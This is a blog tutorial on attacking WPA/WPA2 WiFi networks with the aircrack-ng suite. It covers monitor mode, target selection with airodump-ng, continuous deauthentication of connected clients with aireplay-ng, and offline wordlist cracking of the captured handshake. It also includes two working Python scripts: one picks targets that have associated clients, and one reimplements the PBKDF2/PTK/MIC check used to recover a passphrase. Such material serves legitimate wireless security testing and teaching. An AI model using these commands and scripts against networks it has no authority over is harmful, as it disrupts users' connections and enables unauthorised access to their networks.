Hello everyone! Welcome to pentestguy. In this article we are going to look at WiFi penetration testing using aircrack-ng. There are many ways to test a WiFi network, but the aircrack-ng workflow is the easy, old-school one: capture a WPA/WPA2 four-way handshake from the air and crack the pre-shared key offline against a wordlist.
What is Aircrack-ng?
Aircrack-ng is a complete suite of tools to assess WiFi network security. It focuses on different areas of WiFi security:
Monitoring: Packet capture and export of data to text files for further processing by third party tools.
Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
Testing: Checking WiFi cards and driver capabilities (capture and injection).
Cracking: WEP and WPA/WPA2 PSK.
Basic requirements: Kali Linux and a WiFi adapter that supports monitor mode and packet injection, for example the TP-Link TL-WN722N (v1 only) or an Alfa adapter.
Check for external WiFi adapter
Plug in the external WiFi adapter. The TP-Link TL-WN722N works out of the box only in its v1 revision (Atheros chipset); the current v2/v3 revisions use a Realtek chipset that the stock driver does not support for monitor mode and injection. The Alfa adapters commonly used for this work fine. The built-in card can also be used, provided its driver supports monitor mode and packet injection. First list the interfaces so you know the adapter's name:
ifconfig
In the following case the adapter is wlan0, but it may be wlan1 or something else depending on your device. ifconfig only confirms the interface exists; whether the card can actually inject is checked later, once it is in monitor mode, with aireplay-ng's --test option.
Monitor Mode
Put your WiFi adapter into monitor mode so it can sniff all traffic on the air, not only frames addressed to it. If airmon-ng warns about interfering processes (NetworkManager, wpa_supplicant), stop them first with airmon-ng check kill, otherwise channel hopping and injection may fail.
sudo airmon-ng start wlan0
Here wlan0mon is the monitor-mode interface created by airmon-ng; the name may differ in your case (some drivers keep wlan0). Use this interface name in every command that follows.
Start sniffing all traffic
Start sniffing the WiFi networks around you and choose a specific target:
airodump-ng wlan0mon
Now you can see the access points in range of your WiFi card (top table: BSSID, channel, encryption, ESSID) and the clients associated with them (bottom table: PCs, laptops, phones, each listed with the BSSID it is connected to). Note the BSSID and channel of your target.
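As an added example (not part of the original post), the script below parses the CSV that airodump-ng writes when it is run with --write (add --write survey to the command above to get survey-01.csv; the targeted capture later in this article uses the same flag) and lists the WPA/WPA2 access points that actually have an associated client, strongest signal first, together with the channel-locked airodump-ng command for the top pick. The CSV content, BSSIDs, client MACs and network names are constructed sample data, not a real capture.

```python
"""Choose a WPA/WPA2 target with an associated client from the CSV airodump-ng writes."""
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv:
# access-point table, blank line, station table. Not a real capture.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
10:BE:F5:11:22:33, 2024-05-01 10:00:01, 2024-05-01 10:04:59,  7,  130, WPA2, CCMP, PSK, -41,      212,        0,   0.  0.  0.  0,   7, HomeNet,
F4:F2:6D:44:55:66, 2024-05-01 10:00:02, 2024-05-01 10:04:58,  1,   54, WPA2, CCMP, PSK, -78,       90,        0,   0.  0.  0.  0,  12, Coffee, Shop,
00:1A:2B:77:88:99, 2024-05-01 10:00:03, 2024-05-01 10:04:57, 11,   54, OPN,     ,    , -60,      150,        0,   0.  0.  0.  0,   9, GuestOpen,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
42:60:0A:0B:0C:0D, 2024-05-01 10:00:10, 2024-05-01 10:04:59, -47,       35, 10:BE:F5:11:22:33, HomeNet
C8:3D:D4:0E:0F:10, 2024-05-01 10:01:00, 2024-05-01 10:04:50, -70,        3, (not associated), FreeWifi,HomeNet
"""


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str
    power: int
    essid: str
    clients: List[str] = field(default_factory=list)


def parse_airodump_csv(text: str) -> Dict[str, AccessPoint]:
    """Return access points keyed by BSSID, each with the stations associated to it."""
    aps: Dict[str, AccessPoint] = {}
    in_stations = False
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("BSSID,"):
            in_stations = False
            continue
        if line.startswith("Station MAC,"):
            in_stations = True
            continue
        parts = line.split(",")
        if not in_stations:
            if len(parts) < 15:
                continue                      # truncated row, ignore
            bssid = parts[0].strip()
            aps[bssid] = AccessPoint(
                bssid=bssid,
                channel=int(parts[3]),
                privacy=parts[5].strip(),
                power=int(parts[8]),
                # airodump-ng does not quote ESSIDs, so a name containing commas spills
                # over several fields; everything between ID-length and the trailing
                # Key column is the name
                essid=",".join(parts[13:-1]).strip(),
            )
        elif len(parts) >= 6:
            bssid = parts[5].strip()          # "(not associated)" for probing-only stations
            if bssid in aps:
                aps[bssid].clients.append(parts[0].strip())
    return aps


def pick_targets(text: str) -> List[AccessPoint]:
    """WPA/WPA2 networks with at least one client, strongest signal first.
    Without a client there is no handshake to capture and nothing to deauthenticate."""
    aps = parse_airodump_csv(text)
    candidates = [ap for ap in aps.values()
                  if "WPA" in ap.privacy and ap.clients and ap.power != -1]  # -1 = power unknown
    return sorted(candidates, key=lambda ap: ap.power, reverse=True)


def airodump_command(ap: AccessPoint, prefix: str, iface: str = "wlan0mon") -> str:
    """The channel-locked capture command for a chosen target."""
    return f"airodump-ng --bssid {ap.bssid} --channel {ap.channel} --write {prefix} {iface}"


if __name__ == "__main__":
    targets = pick_targets(SAMPLE_CSV)
    for ap in targets:
        print(f"{ap.essid!r} {ap.bssid} ch{ap.channel} {ap.power} dBm clients={ap.clients}")
    if targets:
        print(airodump_command(targets[0], "testoutput"))
```

Open networks and access points without an associated station are filtered out, because on an open network there is no PSK to recover and without a client there is no four-way handshake to force. Stations that show (not associated) in the BSSID column are only probing and are ignored.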
Sniff for target
Identify the target and capture packets for that access point only, locking the card on its channel, so that the WPA handshake can be captured. Use the target's BSSID and channel from the previous step:
airodump-ng --bssid 10:BE:XX:XX:XX:XX --channel 7 --write testoutput wlan0mon
Check that at least one client is connected to the target (it appears in the bottom table with the target's BSSID). This is essential: the four-way handshake only happens when a client authenticates, so with no client there is nothing to capture and nothing to deauthenticate.
Note: do not close this process until the handshake has been captured. The --write option saves the capture to testoutput-01.cap (plus a .csv and other companion files), and that .cap file is what aircrack-ng needs later.
Deauthenticate target clients
At the same time, open a new terminal and deauthenticate a client from the access point; when it reconnects, the capture running in the other terminal will contain the WPA/WPA2 handshake. Keep both processes running until the handshake has been captured.
aireplay-ng --deauth 0 -a 10:BE:XX:XX:XX:XX -c 42:60:XX:XX:XX:XX wlan0mon
-a is the access point's BSSID and -c is the MAC of the connected client from the airodump-ng station table. A count of 0 sends deauthentication frames continuously until you press Ctrl-C; a small number such as 5 is usually enough, is far less disruptive, and can simply be repeated if the handshake does not appear. Omitting -c broadcasts the deauthentication to every client of that access point. aireplay-ng needs the card to be on the target's channel, which the airodump-ng process above already guarantees.
Check the airodump-ng terminal for the target: when the handshake has been captured, the top right of the screen shows WPA handshake: followed by the target's BSSID.
Crack the hash
Once the handshake has been captured you can close both terminals. Cracking is done offline: the passphrase itself is never in the capture, so the tool derives the key from each candidate passphrase in the wordlist and checks it against the captured handshake. aircrack-ng does this directly from the .cap file; hashcat is much faster on a GPU but needs the capture converted to its own hash format first.
aircrack-ng -w password-list.txt testoutput-01.cap
If aircrack-ng reports that no valid WPA handshake was found, the capture is incomplete and you need to go back to the deauthentication step. Use good password dictionaries such as SecLists, or build a targeted one with crunch. Success depends entirely on the passphrase being in the list, and WPA passphrases are 8 to 63 characters long, so shorter entries are wasted.
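To make the cracking step concrete, here is an added example (written for this page, not code from the post or from the aircrack-ng project) of what the tool does with the handshake: for each candidate passphrase it derives the PMK with PBKDF2 (4096 rounds of HMAC-SHA1 over the passphrase and SSID), expands it with the 802.11 PRF into the PTK, and uses the first 16 bytes (the KCK) to recompute the MIC over EAPOL message 2; a match means the passphrase is correct. The handshake here is constructed inside the script with a known passphrase (the SSID HomeNet, MAC addresses, nonces and RSN IE are all made-up values) rather than read from a .cap file, so it runs offline.

```python
"""What aircrack-ng does with a captured WPA2-PSK handshake: for every candidate
passphrase derive PMK -> PTK -> KCK and compare a recomputed EAPOL MIC with the one
in the capture. The handshake below is constructed for demonstration, not a real capture."""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional

MIC_OFFSET = 81   # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC
MIC_LEN = 16

# RSN IE advertising CCMP/PSK, as a client echoes it in message 2 (constructed).
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes      # from message 1 (AP -> client)
    snonce: bytes      # from message 2 (client -> AP)
    eapol_m2: bytes    # complete message 2 frame, MIC included
    key_version: int   # key descriptor version: 1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1-128 (WPA2/CCMP)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK mapping from IEEE 802.11: PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes.
    This is the expensive step and the reason wordlist quality matters."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 over the two MACs and two nonces; bytes 0-15 of the PTK are the KCK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:64]


def eapol_mic(kck: bytes, frame: bytes, key_version: int) -> bytes:
    """MIC over the whole EAPOL frame with its MIC field zeroed."""
    zeroed = frame[:MIC_OFFSET] + bytes(MIC_LEN) + frame[MIC_OFFSET + MIC_LEN:]
    if key_version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if key_version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]
    raise ValueError("key descriptor version 3 (AES-128-CMAC) is not handled here")


def check_passphrase(candidate: str, hs: Handshake) -> bool:
    """True if the candidate reproduces the MIC found in the captured message 2."""
    pmk = pmk_from_passphrase(candidate, hs.ssid)
    kck = ptk_from_pmk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]
    captured = hs.eapol_m2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    return hmac.compare_digest(eapol_mic(kck, hs.eapol_m2, hs.key_version), captured)


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack. WPA passphrases are 8 to 63 characters, so anything else is skipped."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if 8 <= len(word) <= 63 and check_passphrase(word, hs):
            return word
    return None


def build_m2(snonce: bytes, mic: bytes, key_version: int) -> bytes:
    """EAPOL-Key message 2 layout (constructed): key info = Pairwise | MIC | version."""
    key_info = (0x0108 | key_version).to_bytes(2, "big")
    body = (b"\x02" + key_info + b"\x00\x00" + (1).to_bytes(8, "big") + snonce
            + bytes(16) + bytes(8) + bytes(8) + mic
            + len(RSN_IE).to_bytes(2, "big") + RSN_IE)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def make_sample_handshake(passphrase: str) -> Handshake:
    """Constructed handshake: message 2 signed the way a client holding this PSK would sign it."""
    ssid = "HomeNet"
    ap_mac, sta_mac = bytes.fromhex("10bef5112233"), bytes.fromhex("42600a0b0c0d")
    anonce, snonce = bytes(range(0x00, 0x20)), bytes(range(0x40, 0x60))
    version = 2
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, build_m2(snonce, bytes(MIC_LEN), version), version)
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, build_m2(snonce, mic, version), version)


if __name__ == "__main__":
    hs = make_sample_handshake("summer2019!")
    words = ["password", "12345678", "short", "summer2019!", "qwertyuiop"]
    print("recovered passphrase:", crack(hs, words))
```

Everything the check needs (SSID, both MACs, both nonces and one MIC-protected EAPOL frame) is in the capture, which is why the attack is fully offline and why the only real lever against it is passphrase strength. The SSID is the PBKDF2 salt, so a PMK computed for one network is useless against another with the same passphrase but a different name.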
If you found this post helpful, please share it with your co-workers and friends. Leave a comment and let us know if you have any suggestions. You can also collaborate with us: please check our collaboration page. Thank you!